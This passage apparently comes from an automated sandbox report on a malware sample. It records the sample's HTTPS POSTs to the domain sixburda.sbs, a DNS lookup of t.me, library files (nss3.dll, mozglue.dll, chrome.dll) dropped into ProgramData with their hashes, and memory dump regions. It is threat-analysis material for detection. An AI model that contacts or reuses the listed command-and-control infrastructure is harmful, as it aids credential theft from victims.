                            tls, http
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            1.5kB
                            1.2kB
                            9
                            6

                            HTTP Request

                            POST https://sixburda.sbs/

                            HTTP Response

                            200
                          • 104.21.74.185:443
                            https://sixburda.sbs/
                            tls, http
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            1.5kB
                            1.1kB
                            8
                            5

                            HTTP Request

                            POST https://sixburda.sbs/

                            HTTP Response

                            200
                          • 150.171.27.10:443
                            tse1.mm.bing.net
                            tls, http2
                            1.2kB
                            6.9kB
                            15
                            13
                          • 150.171.27.10:443
                            tse1.mm.bing.net
                            tls, http2
                            1.2kB
                            6.9kB
                            15
                            12
                          • 150.171.27.10:443
                            https://tse1.mm.bing.net/th?id=OADD2.10239317301080_1XM3OKWL8S1Z1BR44&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
                            tls, http2
                            97.4kB
                            2.8MB
                            2028
                            2022

                            HTTP Request

                            GET https://tse1.mm.bing.net/th?id=OADD2.10239339388227_12445L34APGOUOAUP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

                            HTTP Request

                            GET https://tse1.mm.bing.net/th?id=OADD2.10239317301513_17N4ZKW2Z4OBSOG2N&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

                            HTTP Request

                            GET https://tse1.mm.bing.net/th?id=OADD2.10239339388226_1MEO3672GYCIY8OR6&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

                            HTTP Request

                            GET https://tse1.mm.bing.net/th?id=OADD2.10239317301080_1XM3OKWL8S1Z1BR44&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

                            HTTP Response

                            200

                            HTTP Response

                            200

                            HTTP Response

                            200

                            HTTP Response

                            200
                          • 150.171.27.10:443
                            tse1.mm.bing.net
                            tls, http2
                            1.2kB
                            6.9kB
                            15
                            12
                          • 8.8.8.8:53
                            8.8.8.8.in-addr.arpa
                            dns
                            66 B
                            90 B
                            1
                            1

                            DNS Request

                            8.8.8.8.in-addr.arpa

                          • 8.8.8.8:53
                            241.150.49.20.in-addr.arpa
                            dns
                            72 B
                            158 B
                            1
                            1

                            DNS Request

                            241.150.49.20.in-addr.arpa

                          • 8.8.8.8:53
                            172.210.232.199.in-addr.arpa
                            dns
                            74 B
                            128 B
                            1
                            1

                            DNS Request

                            172.210.232.199.in-addr.arpa

                          • 8.8.8.8:53
                            g.bing.com
                            dns
                            56 B
                            148 B
                            1
                            1

                            DNS Request

                            g.bing.com

                            DNS Response

                            150.171.27.10
                            150.171.28.10

                          • 8.8.8.8:53
                            136.32.126.40.in-addr.arpa
                            dns
                            72 B
                            158 B
                            1
                            1

                            DNS Request

                            136.32.126.40.in-addr.arpa

                          • 8.8.8.8:53
                            95.221.229.192.in-addr.arpa
                            dns
                            73 B
                            144 B
                            1
                            1

                            DNS Request

                            95.221.229.192.in-addr.arpa

                          • 8.8.8.8:53
                            10.27.171.150.in-addr.arpa
                            dns
                            72 B
                            158 B
                            1
                            1

                            DNS Request

                            10.27.171.150.in-addr.arpa

                          • 8.8.8.8:53
                            55.36.223.20.in-addr.arpa
                            dns
                            71 B
                            157 B
                            1
                            1

                            DNS Request

                            55.36.223.20.in-addr.arpa

                          • 8.8.8.8:53
                            t.me
                            dns
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            50 B
                            66 B
                            1
                            1

                            DNS Request

                            t.me

                            DNS Response

                            149.154.167.99

                          • 8.8.8.8:53
                            99.167.154.149.in-addr.arpa
                            dns
                            73 B
                            166 B
                            1
                            1

                            DNS Request

                            99.167.154.149.in-addr.arpa

                          • 8.8.8.8:53
                            sixburda.sbs
                            dns
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            58 B
                            90 B
                            1
                            1

                            DNS Request

                            sixburda.sbs

                            DNS Response

                            104.21.74.185
                            172.67.205.154

                          • 8.8.8.8:53
                            c.pki.goog
                            dns
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            56 B
                            107 B
                            1
                            1

                            DNS Request

                            c.pki.goog

                            DNS Response

                            142.250.187.227

                          • 8.8.8.8:53
                            41.249.124.192.in-addr.arpa
                            dns
                            73 B
                            113 B
                            1
                            1

                            DNS Request

                            41.249.124.192.in-addr.arpa

                          • 8.8.8.8:53
                            185.74.21.104.in-addr.arpa
                            dns
                            72 B
                            134 B
                            1
                            1

                            DNS Request

                            185.74.21.104.in-addr.arpa

                          • 8.8.8.8:53
                            227.187.250.142.in-addr.arpa
                            dns
                            74 B
                            112 B
                            1
                            1

                            DNS Request

                            227.187.250.142.in-addr.arpa

                          • 8.8.8.8:53
                            www.google.com
                            dns
                            chrome.exe
                            60 B
                            76 B
                            1
                            1

                            DNS Request

                            www.google.com

                            DNS Response

                            142.250.180.4

                          • 142.250.180.4:443
                            www.google.com
                            https
                            chrome.exe
                            3.9kB
                            47.6kB
                            35
                            50
                          • 8.8.8.8:53
                            ogads-pa.googleapis.com
                            dns
                            chrome.exe
                            69 B
                            277 B
                            1
                            1

                            DNS Request

                            ogads-pa.googleapis.com

                            DNS Response

                            216.58.213.10
                            216.58.201.106
                            142.250.187.234
                            142.250.200.42
                            142.250.187.202
                            216.58.212.234
                            142.250.200.10
                            142.250.179.234
                            172.217.169.74
                            142.250.180.10
                            172.217.16.234
                            216.58.204.74
                            142.250.178.10

                          • 8.8.8.8:53
                            apis.google.com
                            dns
                            chrome.exe
                            61 B
                            98 B
                            1
                            1

                            DNS Request

                            apis.google.com

                            DNS Response

                            172.217.16.238

                          • 172.217.16.238:443
                            apis.google.com
                            https
                            chrome.exe
                            6.6kB
                            49.6kB
                            31
                            47
                          • 216.58.213.10:443
                            ogads-pa.googleapis.com
                            https
                            chrome.exe
                            4.0kB
                            7.3kB
                            12
                            14
                          • 8.8.8.8:53
                            3.180.250.142.in-addr.arpa
                            dns
                            72 B
                            110 B
                            1
                            1

                            DNS Request

                            3.180.250.142.in-addr.arpa

                          • 8.8.8.8:53
                            234.179.250.142.in-addr.arpa
                            dns
                            74 B
                            113 B
                            1
                            1

                            DNS Request

                            234.179.250.142.in-addr.arpa

                          • 8.8.8.8:53
                            238.16.217.172.in-addr.arpa
                            dns
                            73 B
                            142 B
                            1
                            1

                            DNS Request

                            238.16.217.172.in-addr.arpa

                          • 8.8.8.8:53
                            10.213.58.216.in-addr.arpa
                            dns
                            72 B
                            141 B
                            1
                            1

                            DNS Request

                            10.213.58.216.in-addr.arpa

                          • 8.8.8.8:53
                            play.google.com
                            dns
                            chrome.exe
                            61 B
                            77 B
                            1
                            1

                            DNS Request

                            play.google.com

                            DNS Response

                            172.217.16.238

                          • 8.8.8.8:53
                            133.211.185.52.in-addr.arpa
                            dns
                            73 B
                            147 B
                            1
                            1

                            DNS Request

                            133.211.185.52.in-addr.arpa

                          • 8.8.8.8:53
                            clients2.google.com
                            dns
                            chrome.exe
                            65 B
                            105 B
                            1
                            1

                            DNS Request

                            clients2.google.com

                            DNS Response

                            216.58.204.78

                          • 216.58.204.78:443
                            clients2.google.com
                            https
                            chrome.exe
                            3.9kB
                            8.0kB
                            10
                            12
                          • 224.0.0.251:5353
                            chrome.exe
                            204 B
                            3
                          • 8.8.8.8:53
                            78.204.58.216.in-addr.arpa | dns | 72 B | 171 B | 1 | 1
                            DNS Request: 78.204.58.216.in-addr.arpa

                          • 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | dns | 71 B | 157 B | 1 | 1
                            DNS Request: 56.163.245.4.in-addr.arpa

                          • 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | dns | 71 B | 145 B | 1 | 1
                            DNS Request: 206.23.85.13.in-addr.arpa

                          • 8.8.8.8:53 | 67.209.201.84.in-addr.arpa | dns | 72 B | 132 B | 1 | 1
                            DNS Request: 67.209.201.84.in-addr.arpa

                          • 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | dns | 71 B | 157 B | 1 | 1
                            DNS Request: 57.169.31.20.in-addr.arpa

                          • 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | dns | 72 B | 158 B | 1 | 1
                            DNS Request: 48.229.111.52.in-addr.arpa

                          • 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | dns | 71 B | 157 B | 1 | 1
                            DNS Request: 43.58.199.20.in-addr.arpa

                          • 8.8.8.8:53 | tse1.mm.bing.net | dns | 62 B | 170 B | 1 | 1
                            DNS Request: tse1.mm.bing.net
                            DNS Response: 150.171.27.10, 150.171.28.10

                          MITRE ATT&CK Enterprise v15

                          Downloads

                          • C:\ProgramData\chrome.dll (Filesize 676KB)
                            MD5: eda18948a989176f4eebb175ce806255
                            SHA1: ff22a3d5f5fb705137f233c36622c79eab995897
                            SHA256: 81a4f37c5495800b7cc46aea6535d9180dadb5c151db6f1fd1968d1cd8c1eeb4
                            SHA512: 160ed9990c37a4753fc0f5111c94414568654afbedc05308308197df2a99594f2d5d8fe511fd2279543a869ed20248e603d88a0b9b8fb119e8e6131b0c52ff85

                          • C:\ProgramData\mozglue.dll (Filesize 593KB)
                            MD5: c8fd9be83bc728cc04beffafc2907fe9
                            SHA1: 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
                            SHA256: ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
                            SHA512: fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                          • C:\ProgramData\nss3.dll (Filesize 2.0MB)
                            MD5: 1cc453cdf74f31e4d913ff9c10acdde2
                            SHA1: 6e85eae544d6e965f15fa5c39700fa7202f3aafe
                            SHA256: ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
                            SHA512: dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState (Filesize 649B)
                            MD5: 41e307bf041b9eb4cf38fcc285e583cc
                            SHA1: 234766668081ee87d6e8eeb6b84a781d20f75c7b
                            SHA256: 799ef39fac8c01f56520825f2255434623037aca127cb3cb7b2ee52a066443b1
                            SHA512: c9c2875a5853734de24c51cc4d1996e1695da5c57daf4ada2bad3e46335bc24869be8ba97e8686159d0c90eb4222e469a3569a2acf0e609069e93baebf3d6013

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports (Filesize 2B)
                            MD5: d751713988987e9331980363e24189ce
                            SHA1: 97d170e1550eee4afc0af065b78cda302a97674c
                            SHA256: 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
                            SHA512: b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                          • memory/2756-25-0x0000000000400000-0x0000000000700000-memory.dmp (Filesize 3.0MB)
                          • memory/2756-99-0x0000000000400000-0x0000000000700000-memory.dmp (Filesize 3.0MB)
                          • memory/2756-137-0x0000000000400000-0x0000000000700000-memory.dmp (Filesize 3.0MB)
                          • memory/2756-24-0x0000000000400000-0x0000000000700000-memory.dmp (Filesize 3.0MB)
                          • memory/2756-8-0x00000000008C0000-0x00000000009E1000-memory.dmp (Filesize 1.1MB)
                          • memory/2756-78-0x0000000000400000-0x0000000000700000-memory.dmp (Filesize 3.0MB)
                          • memory/2756-79-0x0000000000400000-0x0000000000700000-memory.dmp (Filesize 3.0MB)
                          • memory/2756-85-0x0000000000400000-0x0000000000700000-memory.dmp (Filesize 3.0MB)
                          • memory/2756-86-0x0000000000400000-0x0000000000700000-memory.dmp (Filesize 3.0MB)
                          • memory/2756-27-0x000000001C1F0000-0x000000001C44F000-memory.dmp (Filesize 2.4MB)
                          • memory/2756-100-0x0000000000400000-0x0000000000700000-memory.dmp (Filesize 3.0MB)
                          • memory/2756-5-0x0000000000400000-0x0000000000700000-memory.dmp (Filesize 3.0MB)
                          • memory/2756-3-0x0000000000400000-0x0000000000700000-memory.dmp (Filesize 3.0MB)
                          • memory/2756-128-0x0000000000400000-0x0000000000700000-memory.dmp (Filesize 3.0MB)
                          • memory/2756-129-0x0000000000400000-0x0000000000700000-memory.dmp (Filesize 3.0MB)
                          • memory/2756-136-0x0000000000400000-0x0000000000700000-memory.dmp (Filesize 3.0MB)
                          • memory/3992-2-0x00000000009DB000-0x00000000009DC000-memory.dmp (Filesize 4KB)
